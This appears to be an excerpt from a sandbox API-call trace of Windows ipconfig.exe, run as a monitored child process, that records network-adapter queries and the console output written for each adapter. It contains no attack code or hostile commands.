	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0x120"
	cmd_line = "\"C:\\Windows\\system32\\ipconfig.exe\""
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 291
	os_tid = 0xc68

	[0216.784] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efbb0 | out: lpSystemTimeAsFileTime=0x1efbb0*(dwLowDateTime=0x6d92fbc0, dwHighDateTime=0x1d5eb2b)) 
	[0216.784] GetCurrentProcessId () returned 0xc64
	[0216.784] GetCurrentThreadId () returned 0xc68
	[0216.784] GetTickCount () returned 0x116af72
	[0216.784] QueryPerformanceCounter (in: lpPerformanceCount=0x1efbb8 | out: lpPerformanceCount=0x1efbb8*=33729682857) returned 1
	[0216.791] GetModuleHandleW (lpModuleName=0x0) returned 0xffad0000
	[0216.791] __set_app_type (_Type=0x1) 
	[0216.791] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffad9718) returned 0x0
	[0216.791] __getmainargs (in: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828, _DoWildCard=0, _StartInfo=0xffade83c | out: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828) returned 0
	[0216.791] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0216.791] setlocale (category=0, locale="") returned="English_United States.1252"
	[0217.002] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0217.002] GetCommandLineW () returned="\"C:\\Windows\\system32\\ipconfig.exe\""
	[0217.002] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\system32\\ipconfig.exe\"", pNumArgs=0x1efba8 | out: pNumArgs=0x1efba8) returned 0x2c0250*="C:\\Windows\\system32\\ipconfig.exe"
	[0217.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.002] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0x1efa70, nSize=0x0, Arguments=0x1efa78 | out: lpBuffer="ϰ,") returned 0x1e
	[0217.003] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.003] GetFileType (hFile=0x4f0) returned 0x3
	[0217.003] GetProcessHeap () returned 0x2a0000
	[0217.003] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x3c) returned 0x2b62c0
	[0217.003] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=30, lpMultiByteStr=0x2b62c0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n", lpUsedDefaultChar=0x0) returned 30
	[0217.003] WriteFile (in: hFile=0x4f0, lpBuffer=0x2b62c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efa40, lpOverlapped=0x0 | out: lpBuffer=0x2b62c0*, lpNumberOfBytesWritten=0x1efa40*=0x1e, lpOverlapped=0x0) returned 1
	[0217.006] GetProcessHeap () returned 0x2a0000
	[0217.006] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b62c0 | out: hHeap=0x2a0000) returned 1
	[0217.006] LocalFree (hMem=0x2c03f0) returned 0x0
	[0217.006] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x1efa90*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x1efa90*=0xd40) returned 0x6f
	[0217.505] LocalAlloc (uFlags=0x40, uBytes=0xd40) returned 0x2c03f0
	[0217.506] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x2c03f0, SizePointer=0x1efa90*=0xd40 | out: AdapterAddresses=0x2c03f0*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x2c0780, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x2c0670, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x2c0720, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x2c0750, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x2c05b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x1efa90*=0xd40) returned 0x0
	[0217.572] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="镐,") returned 0x2f
	[0217.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.572] GetFileType (hFile=0x4f0) returned 0x3
	[0217.572] GetProcessHeap () returned 0x2a0000
	[0217.572] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5e) returned 0x2ce5b0
	[0217.572] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\n", cchWideChar=47, lpMultiByteStr=0x2ce5b0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\nÿÿÿÿÿ½\x09\x05", lpUsedDefaultChar=0x0) returned 47
	[0217.572] WriteFile (in: hFile=0x4f0, lpBuffer=0x2ce5b0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2ce5b0*, lpNumberOfBytesWritten=0x1ef5f0*=0x2f, lpOverlapped=0x0) returned 1
	[0217.574] GetProcessHeap () returned 0x2a0000
	[0217.574] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ce5b0 | out: hHeap=0x2a0000) returned 1
	[0217.574] LocalFree (hMem=0x2c9550) returned 0x0
	[0217.574] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="쵐,") returned 0x29
	[0217.574] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.574] GetFileType (hFile=0x4f0) returned 0x3
	[0217.574] GetProcessHeap () returned 0x2a0000
	[0217.574] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x52) returned 0x2c9470
	[0217.574] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x2c9470, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0217.574] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x29, lpOverlapped=0x0) returned 1
	[0217.575] GetProcessHeap () returned 0x2a0000
	[0217.575] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0217.575] LocalFree (hMem=0x2ccd50) returned 0x0
	[0217.575] RtlIpv6AddressToStringExW () returned 0x0
	[0217.575] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="쵐,") returned 0x45
	[0217.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.575] GetFileType (hFile=0x4f0) returned 0x3
	[0217.575] GetProcessHeap () returned 0x2a0000
	[0217.575] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x8a) returned 0x2c9470
	[0217.575] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", cchWideChar=69, lpMultiByteStr=0x2c9470, cbMultiByte=138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 69
	[0217.575] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x45, lpOverlapped=0x0) returned 1
	[0217.576] GetProcessHeap () returned 0x2a0000
	[0217.576] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0217.576] LocalFree (hMem=0x2ccd50) returned 0x0
	[0217.576] RtlIpv4AddressToStringExW () returned 0x0
	[0217.576] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278a, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="쵐,") returned 0x36
	[0217.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0217.576] GetFileType (hFile=0x4f0) returned 0x3
	[0217.576] GetProcessHeap () returned 0x2a0000
	[0217.576] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x6c) returned 0x2c9470
	[0217.576] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n", cchWideChar=54, lpMultiByteStr=0x2c9470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 54
	[0217.576] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x36, lpOverlapped=0x0) returned 1
	[0217.577] GetProcessHeap () returned 0x2a0000
	[0217.577] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0217.577] LocalFree (hMem=0x2ccd50) returned 0x0
	[0217.577] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0x1ef6b0 | out: Mask=0x1ef6b0) returned 0x0
	[0217.577] inet_ntoa (in=0xffffff) returned="255.255.255.0"
	[0218.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c9728, cbMultiByte=-1, lpWideCharStr=0x1ef6f0, cchWideChar=100 | out: lpWideCharStr="255.255.255.0") returned 14
	[0218.096] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278c, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x36
	[0218.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.096] GetFileType (hFile=0x4f0) returned 0x3
	[0218.096] GetProcessHeap () returned 0x2a0000
	[0218.096] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x6c) returned 0x2c9470
	[0218.096] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=54, lpMultiByteStr=0x2c9470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", lpUsedDefaultChar=0x0) returned 54
	[0218.096] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x36, lpOverlapped=0x0) returned 1
	[0218.101] GetProcessHeap () returned 0x2a0000
	[0218.101] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0218.101] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.101] RtlIpv4AddressToStringExW () returned 0x0
	[0218.101] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x34
	[0218.101] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.101] GetFileType (hFile=0x4f0) returned 0x3
	[0218.101] GetProcessHeap () returned 0x2a0000
	[0218.101] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x68) returned 0x2ce5b0
	[0218.101] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x2ce5b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n½\x09\x05", lpUsedDefaultChar=0x0) returned 52
	[0218.101] WriteFile (in: hFile=0x4f0, lpBuffer=0x2ce5b0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2ce5b0*, lpNumberOfBytesWritten=0x1ef5f0*=0x34, lpOverlapped=0x0) returned 1
	[0218.105] GetProcessHeap () returned 0x2a0000
	[0218.105] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ce5b0 | out: hHeap=0x2a0000) returned 1
	[0218.105] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.105] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="镐,") returned 0x43
	[0218.105] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.105] GetFileType (hFile=0x4f0) returned 0x3
	[0218.105] GetProcessHeap () returned 0x2a0000
	[0218.105] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x86) returned 0x2c9470
	[0218.105] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", cchWideChar=67, lpMultiByteStr=0x2c9470, cbMultiByte=134, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 67
	[0218.105] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x43, lpOverlapped=0x0) returned 1
	[0218.111] GetProcessHeap () returned 0x2a0000
	[0218.111] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0218.111] LocalFree (hMem=0x2c9550) returned 0x0
	[0218.111] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xc, InterfaceLuid=0x1ef6a8 | out: InterfaceLuid=0x1ef6a8) returned 0x0
	[0218.112] NsiGetAllParameters () returned 0x0
	[0218.112] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x3b
	[0218.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.112] GetFileType (hFile=0x4f0) returned 0x3
	[0218.112] GetProcessHeap () returned 0x2a0000
	[0218.112] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x76) returned 0x2c9470
	[0218.112] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x2c9470, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.112] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9470*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9470*, lpNumberOfBytesWritten=0x1ef5f0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.114] GetProcessHeap () returned 0x2a0000
	[0218.114] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9470 | out: hHeap=0x2a0000) returned 1
	[0218.114] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.114] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x29
	[0218.114] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.114] GetFileType (hFile=0x4f0) returned 0x3
	[0218.114] GetProcessHeap () returned 0x2a0000
	[0218.114] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x52) returned 0x2c9690
	[0218.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x2c9690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.114] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9690*, lpNumberOfBytesWritten=0x1ef5f0*=0x29, lpOverlapped=0x0) returned 1
	[0218.115] GetProcessHeap () returned 0x2a0000
	[0218.115] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9690 | out: hHeap=0x2a0000) returned 1
	[0218.115] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.115] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="镐,") returned 0x37
	[0218.115] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.115] GetFileType (hFile=0x4f0) returned 0x3
	[0218.115] GetProcessHeap () returned 0x2a0000
	[0218.115] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x6e) returned 0x2d1330
	[0218.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", cchWideChar=55, lpMultiByteStr=0x2d1330, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", lpUsedDefaultChar=0x0) returned 55
	[0218.116] WriteFile (in: hFile=0x4f0, lpBuffer=0x2d1330*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2d1330*, lpNumberOfBytesWritten=0x1ef5f0*=0x37, lpOverlapped=0x0) returned 1
	[0218.119] GetProcessHeap () returned 0x2a0000
	[0218.119] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2d1330 | out: hHeap=0x2a0000) returned 1
	[0218.119] LocalFree (hMem=0x2c9550) returned 0x0
	[0218.119] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xd, InterfaceLuid=0x1ef6a8 | out: InterfaceLuid=0x1ef6a8) returned 0x0
	[0218.119] NsiGetAllParameters () returned 0x0
	[0218.119] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x3b
	[0218.120] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.120] GetFileType (hFile=0x4f0) returned 0x3
	[0218.120] GetProcessHeap () returned 0x2a0000
	[0218.120] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x76) returned 0x2d1330
	[0218.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x2d1330, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.120] WriteFile (in: hFile=0x4f0, lpBuffer=0x2d1330*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2d1330*, lpNumberOfBytesWritten=0x1ef5f0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.121] GetProcessHeap () returned 0x2a0000
	[0218.121] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2d1330 | out: hHeap=0x2a0000) returned 1
	[0218.121] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.121] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x1ef620, nSize=0x0, Arguments=0x1ef628 | out: lpBuffer="컐,") returned 0x29
	[0218.121] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4f0
	[0218.121] GetFileType (hFile=0x4f0) returned 0x3
	[0218.121] GetProcessHeap () returned 0x2a0000
	[0218.121] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x52) returned 0x2c9690
	[0218.121] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x2c9690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.121] WriteFile (in: hFile=0x4f0, lpBuffer=0x2c9690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x1ef5f0, lpOverlapped=0x0 | out: lpBuffer=0x2c9690*, lpNumberOfBytesWritten=0x1ef5f0*=0x29, lpOverlapped=0x0) returned 1
	[0218.122] GetProcessHeap () returned 0x2a0000
	[0218.122] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c9690 | out: hHeap=0x2a0000) returned 1
	[0218.122] LocalFree (hMem=0x2cced0) returned 0x0
	[0218.122] LocalFree (hMem=0x2c03f0) returned 0x0
	[0218.123] CoUninitialize () 
	[0218.123] exit (_Code=0) 

Thread:
	id = 301
	os_tid = 0xc98


Process:
	id = "21"
	image_name = "ipconfig.exe"
	filename = "c:\\windows\\system32\\ipconfig.exe"
	page_root = "0x1d6e5000"
	os_pid = "0xc6c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0xaa0"
	cmd_line = "\"C:\\Windows\\system32\\ipconfig.exe\""
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 292
	os_tid = 0xc70

	[0216.792] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc70 | out: lpSystemTimeAsFileTime=0x12fc70*(dwLowDateTime=0x6d92fbc0, dwHighDateTime=0x1d5eb2b)) 
	[0216.792] GetCurrentProcessId () returned 0xc6c
	[0216.792] GetCurrentThreadId () returned 0xc70
	[0216.792] GetTickCount () returned 0x116af72
	[0216.792] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc78 | out: lpPerformanceCount=0x12fc78*=33730478599) returned 1
